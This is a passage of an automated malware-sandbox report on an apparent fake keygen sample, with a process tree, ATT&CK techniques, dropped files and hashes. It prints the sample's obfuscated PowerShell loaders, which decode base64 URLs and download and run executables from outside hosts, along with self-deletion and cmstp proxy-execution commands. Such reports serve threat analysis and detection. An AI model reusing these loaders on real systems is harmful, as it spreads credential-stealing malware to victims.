                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:980
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2892
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2280
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2572
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2572 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\254456025458472\\* & exit
                      9⤵
                        PID:1512
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2572
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1392
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2412
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2428
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2448
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2480
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2484
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2520
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2588
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\39B6.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1896
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1352
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:2036
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\39B6.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1820
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1992
              • C:\Users\Public\nho.exe
                "C:\Users\Public\nho.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2692
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2860
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:1524
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 836
                      8⤵
                      • Loads dropped DLL
                      • Program crash
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1920
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2892
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:1432
                • C:\Users\Public\nho.exe
                  "C:\Users\Public\nho.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops desktop.ini file(s)
                  • Modifies system certificate store
                  PID:2988
                  • C:\Users\Admin\AppData\Local\Temp\MTW6exiFUB.exe
                    "C:\Users\Admin\AppData\Local\Temp\MTW6exiFUB.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2008
                  • C:\Users\Admin\AppData\Local\Temp\62GhiAdcb2.exe
                    "C:\Users\Admin\AppData\Local\Temp\62GhiAdcb2.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:1860
                  • C:\Users\Admin\AppData\Local\Temp\awNusI1H7e.exe
                    "C:\Users\Admin\AppData\Local\Temp\awNusI1H7e.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1380
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\p23bdoaq.inf
                      8⤵
                        PID:1352
                    • C:\Users\Admin\AppData\Local\Temp\UgZFdnXH4R.exe
                      "C:\Users\Admin\AppData\Local\Temp\UgZFdnXH4R.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1340
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3040
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nho.exe"
                      7⤵
                        PID:2516
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:2508
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\39B6.tmp\ba1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:928
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1576

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          Modify Existing Service

          1
          T1031

          Defense Evasion

          Modify Registry

          4
          T1112

          Disabling Security Tools

          2
          T1089

          Install Root Certificate

          1
          T1130

          Credential Access

          Credentials in Files

          3
          T1081

          Discovery

          Query Registry

          2
          T1012

          System Information Discovery

          2
          T1082

          Collection

          Data from Local System

          3
          T1005

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\freebl3.dll
          • C:\ProgramData\freebl3.dll
          • C:\ProgramData\mozglue.dll
          • C:\ProgramData\mozglue.dll
          • C:\ProgramData\msvcp140.dll
          • C:\ProgramData\nss3.dll
            MD5

            bfac4e3c5908856ba17d41edcd455a51

            SHA1

            8eec7e888767aa9e4cca8ff246eb2aacb9170428

            SHA256

            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

            SHA512

            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

          • C:\ProgramData\softokn3.dll
          • C:\ProgramData\softokn3.dll
          • C:\ProgramData\sqlite3.dll
          • C:\ProgramData\sqlite3.dll
          • C:\ProgramData\vcruntime140.dll
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_645605bc-7b0f-45e9-9270-7e47f7f67eb2
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_81c17b44-e17d-4bf6-b958-b5c1f0c40fad
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_97255350-a513-4c1a-adb4-2ac9ee96ff13
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\Keygen.exe
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\Keygen.exe
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\b.hta
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\b1.hta
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\ba.hta
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\ba1.hta
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\m.hta
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\m1.hta
          • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\start.bat
          • C:\Users\Admin\AppData\Local\Temp\62GhiAdcb2.exe
            MD5

            013db621a3351e3fb049efd2ccad79ff

            SHA1

            a23394ea54dbc5342a77938a2c285ee616185560

            SHA256

            df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

            SHA512

            1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

          • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • C:\Users\Admin\AppData\Local\Temp\MTW6exiFUB.exe
          • C:\Users\Admin\AppData\Local\Temp\MTW6exiFUB.exe
          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
          • C:\Users\Admin\AppData\Local\Temp\UgZFdnXH4R.exe
          • C:\Users\Admin\AppData\Local\Temp\UgZFdnXH4R.exe
          • C:\Users\Admin\AppData\Local\Temp\awNusI1H7e.exe
          • C:\Users\Admin\AppData\Local\Temp\awNusI1H7e.exe
          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          • C:\Users\Public\ihk.exe
          • C:\Users\Public\ihk.exe
          • C:\Users\Public\ihk.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\lks.exe
          • C:\Users\Public\nho.exe
          • C:\Users\Public\nho.exe
          • C:\Users\Public\nho.exe
          • \??\PIPE\srvsvc
          • \??\PIPE\srvsvc
          • \ProgramData\mozglue.dll
          • \ProgramData\mozglue.dll
          • \ProgramData\msvcp140.dll
          • \ProgramData\msvcp140.dll
          • \ProgramData\nss3.dll
            MD5

            bfac4e3c5908856ba17d41edcd455a51

            SHA1

            8eec7e888767aa9e4cca8ff246eb2aacb9170428

            SHA256

            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

            SHA512

            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

          • \ProgramData\nss3.dll
            MD5

            bfac4e3c5908856ba17d41edcd455a51

            SHA1

            8eec7e888767aa9e4cca8ff246eb2aacb9170428

            SHA256

            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

            SHA512

            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

          • \ProgramData\sqlite3.dll
          • \ProgramData\sqlite3.dll
          • \ProgramData\vcruntime140.dll
          • \ProgramData\vcruntime140.dll
          • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
          • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
          • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
          • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
          • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
            MD5

            02cc7b8ee30056d5912de54f1bdfc219

            SHA1

            a6923da95705fb81e368ae48f93d28522ef552fb

            SHA256

            1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

            SHA512

            0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

          • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
          • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
          • \Users\Admin\AppData\LocalLow\sqlite3.dll
          • \Users\Admin\AppData\Local\Temp\39B6.tmp\Keygen.exe
          • \Users\Admin\AppData\Local\Temp\62GhiAdcb2.exe
            MD5

            013db621a3351e3fb049efd2ccad79ff

            SHA1

            a23394ea54dbc5342a77938a2c285ee616185560

            SHA256

            df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

            SHA512

            1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
          • \Users\Admin\AppData\Local\Temp\MTW6exiFUB.exe
          • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
          • \Users\Admin\AppData\Local\Temp\UgZFdnXH4R.exe
          • \Users\Admin\AppData\Local\Temp\awNusI1H7e.exe
          • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
          • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
          • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
          • \Users\Public\ihk.exe
          • \Users\Public\ihk.exe
          • \Users\Public\lks.exe
          • \Users\Public\nho.exe
          • \Users\Public\nho.exe
          • memory/608-294-0x00000000002F0000-0x00000000002F1000-memory.dmp
            Filesize

            4KB

          • memory/608-322-0x0000000000420000-0x0000000000444000-memory.dmp
            Filesize

            144KB

          • memory/608-292-0x0000000000B70000-0x0000000000B71000-memory.dmp
            Filesize

            4KB

          • memory/608-268-0x0000000000000000-mapping.dmp
          • memory/608-277-0x00000000704E0000-0x0000000070BCE000-memory.dmp
            Filesize

            6.9MB

          • memory/804-0-0x0000000000000000-mapping.dmp
          • memory/864-22-0x0000000000000000-mapping.dmp
          • memory/864-34-0x00000000721A0000-0x000000007288E000-memory.dmp
            Filesize

            6.9MB

          • memory/864-44-0x0000000004AB0000-0x0000000004AB1000-memory.dmp
            Filesize

            4KB

          • memory/928-29-0x0000000000000000-mapping.dmp
          • memory/1048-265-0x0000000004D70000-0x0000000004D72000-memory.dmp
            Filesize

            8KB

          • memory/1048-224-0x0000000000000000-mapping.dmp
          • memory/1048-226-0x00000000704E0000-0x0000000070BCE000-memory.dmp
            Filesize

            6.9MB

          • memory/1048-228-0x00000000002E0000-0x00000000002E1000-memory.dmp
            Filesize

            4KB

          • memory/1048-252-0x0000000000740000-0x0000000000791000-memory.dmp
            Filesize

            324KB

          • memory/1048-230-0x0000000000420000-0x0000000000421000-memory.dmp
            Filesize

            4KB

          • memory/1096-4-0x0000000000000000-mapping.dmp
          • memory/1096-5-0x0000000000000000-mapping.dmp
          • memory/1340-351-0x0000000000000000-mapping.dmp
          • memory/1340-356-0x0000000072DA0000-0x000000007348E000-memory.dmp
            Filesize

            6.9MB

          • memory/1340-369-0x0000000001F60000-0x0000000001F71000-memory.dmp
            Filesize

            68KB

          • memory/1340-367-0x00000000004F0000-0x00000000004F3000-memory.dmp
            Filesize

            12KB

          • memory/1340-365-0x0000000000490000-0x00000000004A1000-memory.dmp
            Filesize

            68KB

          • memory/1340-363-0x0000000000250000-0x0000000000251000-memory.dmp
            Filesize

            4KB

          • memory/1340-359-0x0000000000130000-0x0000000000131000-memory.dmp
            Filesize

            4KB

          • memory/1352-104-0x0000000006550000-0x0000000006551000-memory.dmp
            Filesize

            4KB

          • memory/1352-83-0x0000000006600000-0x0000000006601000-memory.dmp
            Filesize

            4KB

          • memory/1352-382-0x0000000000000000-mapping.dmp
          • memory/1352-64-0x0000000005900000-0x0000000005901000-memory.dmp
            Filesize

            4KB

          • memory/1352-70-0x0000000006480000-0x0000000006481000-memory.dmp
            Filesize

            4KB

          • memory/1352-23-0x0000000000000000-mapping.dmp
          • memory/1352-158-0x0000000006800000-0x0000000006801000-memory.dmp
            Filesize

            4KB

          • memory/1352-77-0x0000000006400000-0x0000000006401000-memory.dmp
            Filesize

            4KB

          • memory/1352-69-0x0000000005940000-0x0000000005941000-memory.dmp
            Filesize

            4KB

          • memory/1352-164-0x0000000006810000-0x0000000006811000-memory.dmp
            Filesize

